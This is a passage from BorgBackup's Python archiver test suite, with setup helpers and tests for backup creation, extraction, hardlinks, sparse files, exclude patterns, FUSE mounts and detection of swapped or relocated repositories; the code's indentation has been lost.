if err.errno == errno.ENOSPC:
# already out of space
break
raise
try:
rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
success = rc == EXIT_SUCCESS
if not success:
print('create', rc, out)
finally:
# make sure repo is not locked
shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
os.remove(os.path.join(repo, 'lock.roster'))
finally:
# now some error happened, likely we are out of disk space.
# free some space so we can expect borg to be able to work normally:
shutil.rmtree(reserve, ignore_errors=True)
rc, out = cmd('list', repo)
if rc != EXIT_SUCCESS:
print('list', rc, out)
rc, out = cmd('check', '--repair', repo)
if rc != EXIT_SUCCESS:
print('check', rc, out)
assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
EXE = None # python source based
FORK_DEFAULT = False
prefix = ''
def setUp(self):
os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_RECREATE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
self.archiver = not self.FORK_DEFAULT and Archiver() or None
self.tmpdir = tempfile.mkdtemp()
self.repository_path = os.path.join(self.tmpdir, 'repository')
self.repository_location = self.prefix + self.repository_path
self.input_path = os.path.join(self.tmpdir, 'input')
self.output_path = os.path.join(self.tmpdir, 'output')
self.keys_path = os.path.join(self.tmpdir, 'keys')
self.cache_path = os.path.join(self.tmpdir, 'cache')
self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
os.environ['BORG_KEYS_DIR'] = self.keys_path
os.environ['BORG_CACHE_DIR'] = self.cache_path
os.mkdir(self.input_path)
os.chmod(self.input_path, 0o777) # avoid troubles with fakeroot / FUSE
os.mkdir(self.output_path)
os.mkdir(self.keys_path)
os.mkdir(self.cache_path)
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
with open(self.patterns_file_path, 'wb') as fd:
fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
self._old_wd = os.getcwd()
os.chdir(self.tmpdir)
def tearDown(self):
os.chdir(self._old_wd)
# note: ignore_errors=True as workaround for issue #862
shutil.rmtree(self.tmpdir, ignore_errors=True)
setup_logging()
def cmd(self, *args, **kw):
exit_code = kw.pop('exit_code', 0)
fork = kw.pop('fork', None)
binary_output = kw.get('binary_output', False)
if fork is None:
fork = self.FORK_DEFAULT
ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
if ret != exit_code:
print(output)
self.assert_equal(ret, exit_code)
# if tests are run with the pure-python msgpack, there will be warnings about
# this in the output, which would make a lot of tests fail.
pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
empty = b'' if binary_output else ''
output = empty.join(line for line in output.splitlines(keepends=True)
if pp_msg not in line)
return output
def create_src_archive(self, name):
self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
def open_archive(self, name):
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, name)
return archive, repository
def open_repository(self):
return Repository(self.repository_path, exclusive=True)
def create_regular_file(self, name, size=0, contents=None):
assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
filename = os.path.join(self.input_path, name)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
with open(filename, 'wb') as fd:
if contents is None:
contents = b'X' * size
fd.write(contents)
def create_test_files(self):
"""Create a minimal test case including all supported file types
"""
# File
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('flagfile', size=1024)
# Directory
self.create_regular_file('dir2/file2', size=1024 * 80)
# File mode
os.chmod('input/file1', 0o4755)
# Hard link
if are_hardlinks_supported():
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'hardlink'))
# Symlink
if are_symlinks_supported():
os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
self.create_regular_file('fusexattr', size=1)
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
# ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
# will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
# This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
# into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
# (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
xattr.setxattr(fn, b'user.foo', b'bar')
xattr.setxattr(fn, b'user.empty', b'')
# XXX this always fails for me
# ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
# same for newer ubuntu and centos.
# if this is supported just on specific platform, platform should be checked first,
# so that the test setup for all tests using it does not fail here always for others.
# xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
# FIFO node
if are_fifos_supported():
os.mkfifo(os.path.join(self.input_path, 'fifo1'))
if has_lchflags:
platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
try:
# Block device
os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
# Char device
os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
# File mode
os.chmod('input/dir2', 0o555) # if we take away write perms, we need root to remove contents
# File owner
os.chown('input/file1', 100, 200) # raises OSError invalid argument on cygwin
have_root = True # we have (fake)root
except PermissionError:
have_root = False
except OSError as e:
# Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
if e.errno not in (errno.EINVAL, errno.ENOSYS):
raise
have_root = False
time.sleep(1) # "empty" must have newer timestamp than other files
self.create_regular_file('empty', size=0)
return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
have_root = self.create_test_files()
# fork required to test show-rc output
output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
self.assert_in('borgbackup version', output)
self.assert_in('terminating with success status, rc 0', output)
self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
self.assert_in('Archive name: test.2', output)
self.assert_in('This archive: ', output)
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
list_output = self.cmd('list', '--short', self.repository_location)
self.assert_in('test', list_output)
self.assert_in('test.2', list_output)
expected = [
'input',
'input/bdev',
'input/cdev',
'input/dir2',
'input/dir2/file2',
'input/empty',
'input/file1',
'input/flagfile',
]
if are_fifos_supported():
expected.append('input/fifo1')
if are_symlinks_supported():
expected.append('input/link1')
if are_hardlinks_supported():
expected.append('input/hardlink')
if not have_root:
# we could not create these device files without (fake)root
expected.remove('input/bdev')
expected.remove('input/cdev')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
expected.remove('input/flagfile') # this file is UF_NODUMP
os.remove(os.path.join('input', 'flagfile'))
list_output = self.cmd('list', '--short', self.repository_location + '::test')
for name in expected:
self.assert_in(name, list_output)
self.assert_dirs_equal('input', 'output/input')
info_output = self.cmd('info', self.repository_location + '::test')
item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
self.assert_in('Number of files: %d' % item_count, info_output)
shutil.rmtree(self.cache_path)
info_output2 = self.cmd('info', self.repository_location + '::test')
def filter(output):
# filter for interesting "info" output, ignore cache rebuilding related stuff
prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
'All archives:', 'Chunk index:', ]
result = []
for line in output.splitlines():
for prefix in prefixes:
if line.startswith(prefix):
result.append(line)
return '\n'.join(result)
# the interesting parts of info_output2 and info_output should be same
self.assert_equal(filter(info_output), filter(info_output2))
def test_init_parent_dirs(self):
parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
repository_path = os.path.join(parent_path, 'repository')
repository_location = self.prefix + repository_path
with pytest.raises(Repository.ParentPathDoesNotExist):
# normal borg init does NOT create missing parent dirs
self.cmd('init', '--encryption=none', repository_location)
# but if told so, it does:
self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
assert os.path.exists(parent_path)
def test_unix_socket(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(os.path.join(self.input_path, 'unix-socket'))
except PermissionError as err:
if err.errno == errno.EPERM:
pytest.skip('unix sockets disabled or not supported')
elif err.errno == errno.EACCES:
pytest.skip('permission denied to create unix sockets')
self.cmd('create', self.repository_location + '::test', 'input')
sock.close()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
with open(os.open(some_file, flags_noatime)) as file:
file.read()
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.create_test_files()
atime, mtime = 123456780, 234567890
have_noatime = has_noatime('input/file1')
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--atime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
if have_noatime:
assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
else:
# it touched the input file's atime while backing it up
assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
assert int(sto.st_birthtime * 1e9) == mtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
def test_sparse_file(self):
def is_sparse(fn, total_size, hole_size):
st = os.stat(fn)
assert st.st_size == total_size
sparse = True
if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
sparse = False
if sparse and hasattr(os, 'SEEK_HOLE') and hasattr(os, 'SEEK_DATA'):
with open(fn, 'rb') as fd:
# only check if the first hole is as expected, because the 2nd hole check
# is problematic on xfs due to its "dynamic speculative EOF preallocation
try:
if fd.seek(0, os.SEEK_HOLE) != 0:
sparse = False
if fd.seek(0, os.SEEK_DATA) != hole_size:
sparse = False
except OSError:
# OS/FS does not really support SEEK_HOLE/SEEK_DATA
sparse = False
return sparse
filename = os.path.join(self.input_path, 'sparse')
content = b'foobar'
hole_size = 5 * (1 << CHUNK_MAX_EXP) # 5 full chunker buffers
total_size = hole_size + len(content) + hole_size
with open(filename, 'wb') as fd:
# create a file that has a hole at the beginning and end (if the
# OS and filesystem supports sparse files)
fd.seek(hole_size, 1)
fd.write(content)
fd.seek(hole_size, 1)
pos = fd.tell()
fd.truncate(pos)
# we first check if we could create a sparse input file:
sparse_support = is_sparse(filename, total_size, hole_size)
if sparse_support:
# we could create a sparse input file, so creating a backup of it and
# extracting it again (as sparse) should also work:
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir(self.output_path):
self.cmd('extract', '--sparse', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
filename = os.path.join(self.output_path, 'input', 'sparse')
with open(filename, 'rb') as fd:
# check if file contents are as expected
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_equal(fd.read(len(content)), content)
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
def test_repository_swap_detection(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
self.cmd('delete', '--cache-only', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
# Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
self.create_test_files()
# User initializes her repository with her passphrase
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Attacker replaces it with her own repository, which is encrypted but has no passphrase set
shutil.rmtree(self.repository_path)
with environment_variable(BORG_PASSPHRASE=''):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Delete cache & security database, AKA switch to user perspective
self.cmd('delete', '--cache-only', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
shutil.rmtree(get_security_dir(repository_id))
with environment_variable(BORG_PASSPHRASE=None):
# This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
# is set, while it isn't. Previously this raised no warning,
# since the repository is, technically, encrypted.
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
os.rename(self.repository_path, self.repository_path + '_new')
with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location + '_new')
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location')) as fd:
location = fd.read()
assert location == Location(self.repository_location + '_new').canonical_path()
# Needs no confirmation anymore
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(security_dir)
self.cmd('info', self.repository_location + '_new')
for file in ('location', 'key-type', 'manifest-timestamp'):
assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location'), 'w') as fd:
fd.write('something outdated')
# This is fine, because the cache still has the correct information. security_dir and cache can disagree
# if older versions are used to confirm a renamed repository.
self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
self.cmd('init', '--encryption=none', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
# Ok: repository is known
self.cmd('info', self.repository_location)
# Ok: repository is still known (through security_dir)
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location)
# Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
shutil.rmtree(self.cache_path)
shutil.rmtree(security_dir)
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('info', self.repository_location)
with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location)
def test_strip_components(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
self.assert_true(not os.path.exists('file'))
with self.assert_creates_file('file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
with self.assert_creates_file('dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
with self.assert_creates_file('input/dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
@requires_hardlinks
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_mount_hardlinks(self):
self._extract_hardlinks_setup()
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# we need to get rid of permissions checking because fakeroot causes issues with it.
# On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
# On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
if sys.platform == 'darwin':
ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
else:
ignore_perms = ['-o', 'ignore_permissions']
with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
changedir(mountpoint):
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks1(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks2(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/dir1')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_extract_include_exclude(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/file1', )
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
# Create with regular expression exclusion for file4
self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Extract with regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Combine --exclude with fnmatch and regular expression
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
shutil.rmtree('output/input')
# Combine --exclude-from and regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
'--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
self.cmd("init", '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
self.create_regular_file("file333", size=1024 * 80)
self.cmd("create", self.repository_location + "::test", "input")
# Extract everything with regular expression
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "re:.*")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
shutil.rmtree("output/input")
# Extract with pattern while also excluding files
with changedir("output"):
self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
shutil.rmtree("output/input")
# Combine --exclude with pattern for extraction
with changedir("output"):
self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
shutil.rmtree("output/input")
# Multiple pattern
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
def test_extract_progress(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test', '--progress')
assert 'Extracting:' in output
